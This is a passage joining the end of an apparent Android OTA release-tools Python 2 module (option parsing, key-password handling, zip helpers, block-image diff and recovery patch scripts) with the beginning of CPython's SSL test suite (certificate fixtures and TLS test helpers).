-x (--extra) <key=value>
Add a key/value pair to the 'extras' dict, which device-specific
extension code may look at.
-v (--verbose)
Show command lines being executed.
-h (--help)
Display this usage message and exit.
"""
def Usage(docstring):
print docstring.rstrip("\n")
print COMMON_DOCSTRING
def ParseOptions(argv,
docstring,
extra_opts="", extra_long_opts=(),
extra_option_handler=None):
"""Parse the options in argv and return any arguments that aren't
flags. docstring is the calling module's docstring, to be displayed
for errors and -h. extra_opts and extra_long_opts are for flags
defined by the caller, which are processed by passing them to
extra_option_handler."""
try:
opts, args = getopt.getopt(
argv, "hvp:s:x:" + extra_opts,
["help", "verbose", "path=", "signapk_path=", "extra_signapk_args=",
"java_path=", "java_args=", "public_key_suffix=",
"private_key_suffix=", "boot_signer_path=", "boot_signer_args=",
"verity_signer_path=", "verity_signer_args=", "device_specific=",
"extra="] +
list(extra_long_opts))
except getopt.GetoptError as err:
Usage(docstring)
print "**", str(err), "**"
sys.exit(2)
for o, a in opts:
if o in ("-h", "--help"):
Usage(docstring)
sys.exit()
elif o in ("-v", "--verbose"):
OPTIONS.verbose = True
elif o in ("-p", "--path"):
OPTIONS.search_path = a
elif o in ("--signapk_path",):
OPTIONS.signapk_path = a
elif o in ("--extra_signapk_args",):
OPTIONS.extra_signapk_args = shlex.split(a)
elif o in ("--java_path",):
OPTIONS.java_path = a
elif o in ("--java_args",):
OPTIONS.java_args = a
elif o in ("--public_key_suffix",):
OPTIONS.public_key_suffix = a
elif o in ("--private_key_suffix",):
OPTIONS.private_key_suffix = a
elif o in ("--boot_signer_path",):
OPTIONS.boot_signer_path = a
elif o in ("--boot_signer_args",):
OPTIONS.boot_signer_args = shlex.split(a)
elif o in ("--verity_signer_path",):
OPTIONS.verity_signer_path = a
elif o in ("--verity_signer_args",):
OPTIONS.verity_signer_args = shlex.split(a)
elif o in ("-s", "--device_specific"):
OPTIONS.device_specific = a
elif o in ("-x", "--extra"):
key, value = a.split("=", 1)
OPTIONS.extras[key] = value
else:
if extra_option_handler is None or not extra_option_handler(o, a):
assert False, "unknown option \"%s\"" % (o,)
if OPTIONS.search_path:
os.environ["PATH"] = (os.path.join(OPTIONS.search_path, "bin") +
os.pathsep + os.environ["PATH"])
return args
def MakeTempFile(prefix=None, suffix=None):
"""Make a temp file and add it to the list of things to be deleted
when Cleanup() is called. Return the filename."""
fd, fn = tempfile.mkstemp(prefix=prefix, suffix=suffix)
os.close(fd)
OPTIONS.tempfiles.append(fn)
return fn
def Cleanup():
for i in OPTIONS.tempfiles:
if os.path.isdir(i):
shutil.rmtree(i)
else:
os.remove(i)
class PasswordManager(object):
def __init__(self):
self.editor = os.getenv("EDITOR", None)
self.pwfile = os.getenv("ANDROID_PW_FILE", None)
def GetPasswords(self, items):
"""Get passwords corresponding to each string in 'items',
returning a dict. (The dict may have keys in addition to the
values in 'items'.)
Uses the passwords in $ANDROID_PW_FILE if available, letting the
user edit that file to add more needed passwords. If no editor is
available, or $ANDROID_PW_FILE isn't define, prompts the user
interactively in the ordinary way.
"""
current = self.ReadFile()
first = True
while True:
missing = []
for i in items:
if i not in current or not current[i]:
missing.append(i)
# Are all the passwords already in the file?
if not missing:
return current
for i in missing:
current[i] = ""
if not first:
print "key file %s still missing some passwords." % (self.pwfile,)
answer = raw_input("try to edit again? [y]> ").strip()
if answer and answer[0] not in 'yY':
raise RuntimeError("key passwords unavailable")
first = False
current = self.UpdateAndReadFile(current)
def PromptResult(self, current): # pylint: disable=no-self-use
"""Prompt the user to enter a value (password) for each key in
'current' whose value is fales. Returns a new dict with all the
values.
"""
result = {}
for k, v in sorted(current.iteritems()):
if v:
result[k] = v
else:
while True:
result[k] = getpass.getpass(
"Enter password for %s key> " % k).strip()
if result[k]:
break
return result
def UpdateAndReadFile(self, current):
if not self.editor or not self.pwfile:
return self.PromptResult(current)
f = open(self.pwfile, "w")
os.chmod(self.pwfile, 0o600)
f.write("# Enter key passwords between the [[[ ]]] brackets.\n")
f.write("# (Additional spaces are harmless.)\n\n")
first_line = None
sorted_list = sorted([(not v, k, v) for (k, v) in current.iteritems()])
for i, (_, k, v) in enumerate(sorted_list):
f.write("[[[ %s ]]] %s\n" % (v, k))
if not v and first_line is None:
# position cursor on first line with no password.
first_line = i + 4
f.close()
p = Run([self.editor, "+%d" % (first_line,), self.pwfile])
_, _ = p.communicate()
return self.ReadFile()
def ReadFile(self):
result = {}
if self.pwfile is None:
return result
try:
f = open(self.pwfile, "r")
for line in f:
line = line.strip()
if not line or line[0] == '#':
continue
m = re.match(r"^\[\[\[\s*(.*?)\s*\]\]\]\s*(\S+)$", line)
if not m:
print "failed to parse password file: ", line
else:
result[m.group(2)] = m.group(1)
f.close()
except IOError as e:
if e.errno != errno.ENOENT:
print "error reading password file: ", str(e)
return result
def ZipWrite(zip_file, filename, arcname=None, perms=0o644,
compress_type=None):
import datetime
# http://b/18015246
# Python 2.7's zipfile implementation wrongly thinks that zip64 is required
# for files larger than 2GiB. We can work around this by adjusting their
# limit. Note that `zipfile.writestr()` will not work for strings larger than
# 2GiB. The Python interpreter sometimes rejects strings that large (though
# it isn't clear to me exactly what circumstances cause this).
# `zipfile.write()` must be used directly to work around this.
#
# This mess can be avoided if we port to python3.
saved_zip64_limit = zipfile.ZIP64_LIMIT
zipfile.ZIP64_LIMIT = (1 << 32) - 1
if compress_type is None:
compress_type = zip_file.compression
if arcname is None:
arcname = filename
saved_stat = os.stat(filename)
try:
# `zipfile.write()` doesn't allow us to pass ZipInfo, so just modify the
# file to be zipped and reset it when we're done.
os.chmod(filename, perms)
# Use a fixed timestamp so the output is repeatable.
epoch = datetime.datetime.fromtimestamp(0)
timestamp = (datetime.datetime(2009, 1, 1) - epoch).total_seconds()
os.utime(filename, (timestamp, timestamp))
zip_file.write(filename, arcname=arcname, compress_type=compress_type)
finally:
os.chmod(filename, saved_stat.st_mode)
os.utime(filename, (saved_stat.st_atime, saved_stat.st_mtime))
zipfile.ZIP64_LIMIT = saved_zip64_limit
def ZipWriteStr(zip_file, zinfo_or_arcname, data, perms=None,
compress_type=None):
"""Wrap zipfile.writestr() function to work around the zip64 limit.
Even with the ZIP64_LIMIT workaround, it won't allow writing a string
longer than 2GiB. It gives 'OverflowError: size does not fit in an int'
when calling crc32(bytes).
But it still works fine to write a shorter string into a large zip file.
We should use ZipWrite() whenever possible, and only use ZipWriteStr()
when we know the string won't be too long.
"""
saved_zip64_limit = zipfile.ZIP64_LIMIT
zipfile.ZIP64_LIMIT = (1 << 32) - 1
if not isinstance(zinfo_or_arcname, zipfile.ZipInfo):
zinfo = zipfile.ZipInfo(filename=zinfo_or_arcname)
zinfo.compress_type = zip_file.compression
if perms is None:
perms = 0o644
else:
zinfo = zinfo_or_arcname
# If compress_type is given, it overrides the value in zinfo.
if compress_type is not None:
zinfo.compress_type = compress_type
# If perms is given, it has a priority.
if perms is not None:
zinfo.external_attr = perms << 16
# Use a fixed timestamp so the output is repeatable.
zinfo.date_time = (2009, 1, 1, 0, 0, 0)
zip_file.writestr(zinfo, data)
zipfile.ZIP64_LIMIT = saved_zip64_limit
def ZipClose(zip_file):
# http://b/18015246
# zipfile also refers to ZIP64_LIMIT during close() when it writes out the
# central directory.
saved_zip64_limit = zipfile.ZIP64_LIMIT
zipfile.ZIP64_LIMIT = (1 << 32) - 1
zip_file.close()
zipfile.ZIP64_LIMIT = saved_zip64_limit
class DeviceSpecificParams(object):
module = None
def __init__(self, **kwargs):
"""Keyword arguments to the constructor become attributes of this
object, which is passed to all functions in the device-specific
module."""
for k, v in kwargs.iteritems():
setattr(self, k, v)
self.extras = OPTIONS.extras
if self.module is None:
path = OPTIONS.device_specific
if not path:
return
try:
if os.path.isdir(path):
info = imp.find_module("releasetools", [path])
else:
d, f = os.path.split(path)
b, x = os.path.splitext(f)
if x == ".py":
f = b
info = imp.find_module(f, [d])
print "loaded device-specific extensions from", path
self.module = imp.load_module("device_specific", *info)
except ImportError:
print "unable to load device-specific module; assuming none"
def _DoCall(self, function_name, *args, **kwargs):
"""Call the named function in the device-specific module, passing
the given args and kwargs. The first argument to the call will be
the DeviceSpecific object itself. If there is no module, or the
module does not define the function, return the value of the
'default' kwarg (which itself defaults to None)."""
if self.module is None or not hasattr(self.module, function_name):
return kwargs.get("default", None)
return getattr(self.module, function_name)(*((self,) + args), **kwargs)
def FullOTA_Assertions(self):
"""Called after emitting the block of assertions at the top of a
full OTA package. Implementations can add whatever additional
assertions they like."""
return self._DoCall("FullOTA_Assertions")
def FullOTA_InstallBegin(self):
"""Called at the start of full OTA installation."""
return self._DoCall("FullOTA_InstallBegin")
def FullOTA_InstallEnd(self):
"""Called at the end of full OTA installation; typically this is
used to install the image for the device's baseband processor."""
return self._DoCall("FullOTA_InstallEnd")
def IncrementalOTA_Assertions(self):
"""Called after emitting the block of assertions at the top of an
incremental OTA package. Implementations can add whatever
additional assertions they like."""
return self._DoCall("IncrementalOTA_Assertions")
def IncrementalOTA_VerifyBegin(self):
"""Called at the start of the verification phase of incremental
OTA installation; additional checks can be placed here to abort
the script before any changes are made."""
return self._DoCall("IncrementalOTA_VerifyBegin")
def IncrementalOTA_VerifyEnd(self):
"""Called at the end of the verification phase of incremental OTA
installation; additional checks can be placed here to abort the
script before any changes are made."""
return self._DoCall("IncrementalOTA_VerifyEnd")
def IncrementalOTA_InstallBegin(self):
"""Called at the start of incremental OTA installation (after
verification is complete)."""
return self._DoCall("IncrementalOTA_InstallBegin")
def IncrementalOTA_InstallEnd(self):
"""Called at the end of incremental OTA installation; typically
this is used to install the image for the device's baseband
processor."""
return self._DoCall("IncrementalOTA_InstallEnd")
class File(object):
def __init__(self, name, data):
self.name = name
self.data = data
self.size = len(data)
self.sha1 = sha1(data).hexdigest()
@classmethod
def FromLocalFile(cls, name, diskname):
f = open(diskname, "rb")
data = f.read()
f.close()
return File(name, data)
def WriteToTemp(self):
t = tempfile.NamedTemporaryFile()
t.write(self.data)
t.flush()
return t
def AddToZip(self, z, compression=None):
ZipWriteStr(z, self.name, self.data, compress_type=compression)
DIFF_PROGRAM_BY_EXT = {
".gz" : "imgdiff",
".zip" : ["imgdiff", "-z"],
".jar" : ["imgdiff", "-z"],
".apk" : ["imgdiff", "-z"],
".img" : "imgdiff",
}
class Difference(object):
def __init__(self, tf, sf, diff_program=None):
self.tf = tf
self.sf = sf
self.patch = None
self.diff_program = diff_program
def ComputePatch(self):
"""Compute the patch (as a string of data) needed to turn sf into
tf. Returns the same tuple as GetPatch()."""
tf = self.tf
sf = self.sf
if self.diff_program:
diff_program = self.diff_program
else:
ext = os.path.splitext(tf.name)[1]
diff_program = DIFF_PROGRAM_BY_EXT.get(ext, "bsdiff")
ttemp = tf.WriteToTemp()
stemp = sf.WriteToTemp()
ext = os.path.splitext(tf.name)[1]
try:
ptemp = tempfile.NamedTemporaryFile()
if isinstance(diff_program, list):
cmd = copy.copy(diff_program)
else:
cmd = [diff_program]
cmd.append(stemp.name)
cmd.append(ttemp.name)
cmd.append(ptemp.name)
p = Run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
err = []
def run():
_, e = p.communicate()
if e:
err.append(e)
th = threading.Thread(target=run)
th.start()
th.join(timeout=300) # 5 mins
if th.is_alive():
print "WARNING: diff command timed out"
p.terminate()
th.join(5)
if th.is_alive():
p.kill()
th.join()
if err or p.returncode != 0:
print "WARNING: failure running %s:\n%s\n" % (
diff_program, "".join(err))
self.patch = None
return None, None, None
diff = ptemp.read()
finally:
ptemp.close()
stemp.close()
ttemp.close()
self.patch = diff
return self.tf, self.sf, self.patch
def GetPatch(self):
"""Return a tuple (target_file, source_file, patch_data).
patch_data may be None if ComputePatch hasn't been called, or if
computing the patch failed."""
return self.tf, self.sf, self.patch
def ComputeDifferences(diffs):
"""Call ComputePatch on all the Difference objects in 'diffs'."""
print len(diffs), "diffs to compute"
# Do the largest files first, to try and reduce the long-pole effect.
by_size = [(i.tf.size, i) for i in diffs]
by_size.sort(reverse=True)
by_size = [i[1] for i in by_size]
lock = threading.Lock()
diff_iter = iter(by_size) # accessed under lock
def worker():
try:
lock.acquire()
for d in diff_iter:
lock.release()
start = time.time()
d.ComputePatch()
dur = time.time() - start
lock.acquire()
tf, sf, patch = d.GetPatch()
if sf.name == tf.name:
name = tf.name
else:
name = "%s (%s)" % (tf.name, sf.name)
if patch is None:
print "patching failed! %s" % (name,)
else:
print "%8.2f sec %8d / %8d bytes (%6.2f%%) %s" % (
dur, len(patch), tf.size, 100.0 * len(patch) / tf.size, name)
lock.release()
except Exception as e:
print e
raise
# start worker threads; wait for them all to finish.
threads = [threading.Thread(target=worker)
for i in range(OPTIONS.worker_threads)]
for th in threads:
th.start()
while threads:
threads.pop().join()
class BlockDifference(object):
def __init__(self, partition, tgt, src=None, check_first_block=False,
version=None):
self.tgt = tgt
self.src = src
self.partition = partition
self.check_first_block = check_first_block
# Due to http://b/20939131, check_first_block is disabled temporarily.
assert not self.check_first_block
if version is None:
version = 1
if OPTIONS.info_dict:
version = max(
int(i) for i in
OPTIONS.info_dict.get("blockimgdiff_versions", "1").split(","))
self.version = version
b = blockimgdiff.BlockImageDiff(tgt, src, threads=OPTIONS.worker_threads,
version=self.version)
tmpdir = tempfile.mkdtemp()
OPTIONS.tempfiles.append(tmpdir)
self.path = os.path.join(tmpdir, partition)
b.Compute(self.path)
if src is None:
_, self.device = GetTypeAndDevice("/" + partition, OPTIONS.info_dict)
else:
_, self.device = GetTypeAndDevice("/" + partition,
OPTIONS.source_info_dict)
def WriteScript(self, script, output_zip, progress=None):
if not self.src:
# write the output unconditionally
script.Print("Patching %s image unconditionally..." % (self.partition,))
else:
script.Print("Patching %s image after verification." % (self.partition,))
if progress:
script.ShowProgress(progress, 0)
self._WriteUpdate(script, output_zip)
self._WritePostInstallVerifyScript(script)
def WriteVerifyScript(self, script):
partition = self.partition
if not self.src:
script.Print("Image %s will be patched unconditionally." % (partition,))
else:
ranges = self.src.care_map.subtract(self.src.clobbered_blocks)
ranges_str = ranges.to_string_raw()
if self.version >= 3:
script.AppendExtra(('if (range_sha1("%s", "%s") == "%s" || '
'block_image_verify("%s", '
'package_extract_file("%s.transfer.list"), '
'"%s.new.dat", "%s.patch.dat")) then') % (
self.device, ranges_str, self.src.TotalSha1(),
self.device, partition, partition, partition))
else:
script.AppendExtra('if range_sha1("%s", "%s") == "%s" then' % (
self.device, ranges_str, self.src.TotalSha1()))
script.Print('Verified %s image...' % (partition,))
script.AppendExtra('else')
# When generating incrementals for the system and vendor partitions,
# explicitly check the first block (which contains the superblock) of
# the partition to see if it's what we expect. If this check fails,
# give an explicit log message about the partition having been
# remounted R/W (the most likely explanation) and the need to flash to
# get OTAs working again.
if self.check_first_block:
self._CheckFirstBlock(script)
# Abort the OTA update. Note that the incremental OTA cannot be applied
# even if it may match the checksum of the target partition.
# a) If version < 3, operations like move and erase will make changes
# unconditionally and damage the partition.
# b) If version >= 3, it won't even reach here.
script.AppendExtra(('abort("%s partition has unexpected contents");\n'
'endif;') % (partition,))
def _WritePostInstallVerifyScript(self, script):
partition = self.partition
script.Print('Verifying the updated %s image...' % (partition,))
# Unlike pre-install verification, clobbered_blocks should not be ignored.
ranges = self.tgt.care_map
ranges_str = ranges.to_string_raw()
script.AppendExtra('if range_sha1("%s", "%s") == "%s" then' % (
self.device, ranges_str,
self.tgt.TotalSha1(include_clobbered_blocks=True)))
# Bug: 20881595
# Verify that extended blocks are really zeroed out.
if self.tgt.extended:
ranges_str = self.tgt.extended.to_string_raw()
script.AppendExtra('if range_sha1("%s", "%s") == "%s" then' % (
self.device, ranges_str,
self._HashZeroBlocks(self.tgt.extended.size())))
script.Print('Verified the updated %s image.' % (partition,))
script.AppendExtra(
'else\n'
' abort("%s partition has unexpected non-zero contents after OTA '
'update");\n'
'endif;' % (partition,))
else:
script.Print('Verified the updated %s image.' % (partition,))
script.AppendExtra(
'else\n'
' abort("%s partition has unexpected contents after OTA update");\n'
'endif;' % (partition,))
def _WriteUpdate(self, script, output_zip):
ZipWrite(output_zip,
'{}.transfer.list'.format(self.path),
'{}.transfer.list'.format(self.partition))
ZipWrite(output_zip,
'{}.new.dat'.format(self.path),
'{}.new.dat'.format(self.partition))
ZipWrite(output_zip,
'{}.patch.dat'.format(self.path),
'{}.patch.dat'.format(self.partition),
compress_type=zipfile.ZIP_STORED)
call = ('block_image_update("{device}", '
'package_extract_file("{partition}.transfer.list"), '
'"{partition}.new.dat", "{partition}.patch.dat");\n'.format(
device=self.device, partition=self.partition))
script.AppendExtra(script.WordWrap(call))
def _HashBlocks(self, source, ranges): # pylint: disable=no-self-use
data = source.ReadRangeSet(ranges)
ctx = sha1()
for p in data:
ctx.update(p)
return ctx.hexdigest()
def _HashZeroBlocks(self, num_blocks): # pylint: disable=no-self-use
"""Return the hash value for all zero blocks."""
zero_block = '\x00' * 4096
ctx = sha1()
for _ in range(num_blocks):
ctx.update(zero_block)
return ctx.hexdigest()
# TODO(tbao): Due to http://b/20939131, block 0 may be changed without
# remounting R/W. Will change the checking to a finer-grained way to
# mask off those bits.
def _CheckFirstBlock(self, script):
r = rangelib.RangeSet((0, 1))
srchash = self._HashBlocks(self.src, r)
script.AppendExtra(('(range_sha1("%s", "%s") == "%s") || '
'abort("%s has been remounted R/W; '
'reflash device to reenable OTA updates");')
% (self.device, r.to_string_raw(), srchash,
self.device))
DataImage = blockimgdiff.DataImage
# map recovery.fstab's fs_types to mount/format "partition types"
PARTITION_TYPES = {
"yaffs2": "MTD",
"mtd": "MTD",
"ext4": "EMMC",
"emmc": "EMMC",
"f2fs": "EMMC",
"squashfs": "EMMC"
}
def GetTypeAndDevice(mount_point, info):
fstab = info["fstab"]
if fstab:
return (PARTITION_TYPES[fstab[mount_point].fs_type],
fstab[mount_point].device)
else:
raise KeyError
def ParseCertificate(data):
"""Parse a PEM-format certificate."""
cert = []
save = False
for line in data.split("\n"):
if "--END CERTIFICATE--" in line:
break
if save:
cert.append(line)
if "--BEGIN CERTIFICATE--" in line:
save = True
cert = "".join(cert).decode('base64')
return cert
def MakeRecoveryPatch(input_dir, output_sink, recovery_img, boot_img,
info_dict=None):
"""Generate a binary patch that creates the recovery image starting
with the boot image. (Most of the space in these images is just the
kernel, which is identical for the two, so the resulting patch
should be efficient.) Add it to the output zip, along with a shell
script that is run from init.rc on first boot to actually do the
patching and install the new recovery image.
recovery_img and boot_img should be File objects for the
corresponding images. info should be the dictionary returned by
common.LoadInfoDict() on the input target_files.
"""
if info_dict is None:
info_dict = OPTIONS.info_dict
diff_program = ["imgdiff"]
path = os.path.join(input_dir, "SYSTEM", "etc", "recovery-resource.dat")
if os.path.exists(path):
diff_program.append("-b")
diff_program.append(path)
bonus_args = "-b /system/etc/recovery-resource.dat"
else:
bonus_args = ""
d = Difference(recovery_img, boot_img, diff_program=diff_program)
_, _, patch = d.ComputePatch()
output_sink("recovery-from-boot.p", patch)
try:
# The following GetTypeAndDevice()s need to use the path in the target
# info_dict instead of source_info_dict.
boot_type, boot_device = GetTypeAndDevice("/boot", info_dict)
recovery_type, recovery_device = GetTypeAndDevice("/recovery", info_dict)
except KeyError:
return
sh = """#!/system/bin/sh
if ! applypatch -c %(recovery_type)s:%(recovery_device)s:%(recovery_size)d:%(recovery_sha1)s; then
applypatch %(bonus_args)s %(boot_type)s:%(boot_device)s:%(boot_size)d:%(boot_sha1)s %(recovery_type)s:%(recovery_device)s %(recovery_sha1)s %(recovery_size)d %(boot_sha1)s:/system/recovery-from-boot.p && log -t recovery "Installing new recovery image: succeeded" || log -t recovery "Installing new recovery image: failed"
else
log -t recovery "Recovery image already installed"
fi
""" % {'boot_size': boot_img.size,
'boot_sha1': boot_img.sha1,
'recovery_size': recovery_img.size,
'recovery_sha1': recovery_img.sha1,
'boot_type': boot_type,
'boot_device': boot_device,
'recovery_type': recovery_type,
'recovery_device': recovery_device,
'bonus_args': bonus_args}
# The install script location moved from /system/etc to /system/bin
# in the L release. Parse the init.rc file to find out where the
# target-files expects it to be, and put it there.
sh_location = "etc/install-recovery.sh"
try:
with open(os.path.join(input_dir, "BOOT", "RAMDISK", "init.rc")) as f:
for line in f:
m = re.match(r"^service flash_recovery /system/(\S+)\s*$", line)
if m:
sh_location = m.group(1)
print "putting script in", sh_location
break
except (OSError, IOError) as e:
print "failed to read init.rc: %s" % (e,)
output_sink(sh_location, sh)
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
import socket
import select
import time
import datetime
import enum
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import sysconfig
import functools
try:
import ctypes
except ImportError:
ctypes = None
ssl = import_helper.import_module("ssl")
import _ssl
from ssl import TLSVersion, _TLSContentType, _TLSMessageType, _TLSAlertType
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = socket_helper.HOST
IS_OPENSSL_3_0_0 = ssl.OPENSSL_VERSION_INFO >= (3, 0, 0)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Oct 28 14:23:16 2037 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
NOSANFILE = data_file("nosan.pem")
NOSAN_HOSTNAME = 'localhost'
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
OP_IGNORE_UNEXPECTED_EOF = getattr(ssl, "OP_IGNORE_UNEXPECTED_EOF", 0)
# Ubuntu has patched OpenSSL and changed behavior of security level 2
# see https://bugs.python.org/issue41561#msg389003
def is_ubuntu():
try:
# Assume that any references of "ubuntu" implies Ubuntu-like distro
# The workaround is not required for 18.04, but doesn't hurt either.
with open("/etc/os-release", encoding="utf-8") as f:
return "ubuntu" in f.read()
except FileNotFoundError:
return False
if is_ubuntu():
def seclevel_workaround(*ctxs):
""""Lower security level to '1' and allow all ciphers for TLS 1.0/1"""
for ctx in ctxs:
if (
hasattr(ctx, "minimum_version") and
ctx.minimum_version <= ssl.TLSVersion.TLSv1_1
):
ctx.set_ciphers("@SECLEVEL=1:ALL")
else:
def seclevel_workaround(*ctxs):
pass
def has_tls_protocol(protocol):
"""Check if a TLS protocol is available and enabled
:param protocol: enum ssl._SSLMethod member or name
:return: bool
"""
if isinstance(protocol, str):
assert protocol.startswith('PROTOCOL_')
protocol = getattr(ssl, protocol, None)
if protocol is None:
return False
if protocol in {
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER,
ssl.PROTOCOL_TLS_CLIENT
}:
# auto-negotiate protocols are always available
return True
name = protocol.name
return has_tls_version(name[len('PROTOCOL_'):])
@functools.lru_cache
def has_tls_version(version):
"""Check if a TLS/SSL version is enabled
:param version: TLS version name or ssl.TLSVersion member
:return: bool
"""
if version == "SSLv2":
# never supported and not even in TLSVersion enum
return False
if isinstance(version, str):
version = ssl.TLSVersion.__members__[version]
# check compile time flags like ssl.HAS_TLSv1_2
if not getattr(ssl, f'HAS_{version.name}'):
return False
if IS_OPENSSL_3_0_0 and version < ssl.TLSVersion.TLSv1_2:
# bpo43791: 3.0.0-alpha14 fails with TLSV1_ALERT_INTERNAL_ERROR
return False
# check runtime and dynamic crypto policy settings. A TLS version may
# be compiled in but disabled by a policy or config option.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
if (
hasattr(ctx, 'minimum_version') and
ctx.minimum_version != ssl.TLSVersion.MINIMUM_SUPPORTED and
version < ctx.minimum_version
):
return False
if (
hasattr(ctx, 'maximum_version') and
ctx.maximum_version != ssl.TLSVersion.MAXIMUM_SUPPORTED and
version > ctx.maximum_version
):
return False
return True
def requires_tls_version(version):
"""Decorator to skip tests when a required TLS version is not available
:param version: TLS version name or ssl.TLSVersion member
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if not has_tls_version(version):
raise unittest.SkipTest(f"{version} is not available.")
else:
return func(*args, **kw)
return wrapper
return decorator
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
ignore_deprecation = warnings_helper.ignore_warnings(
category=DeprecationWarning
)
def test_wrap_socket(sock, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
if not kwargs.get("server_side"):
kwargs["server_hostname"] = SIGNED_CERTFILE_HOSTNAME
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
else:
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE, *, server_chain=True):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
elif server_cert == NOSANFILE:
hostname = NOSAN_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
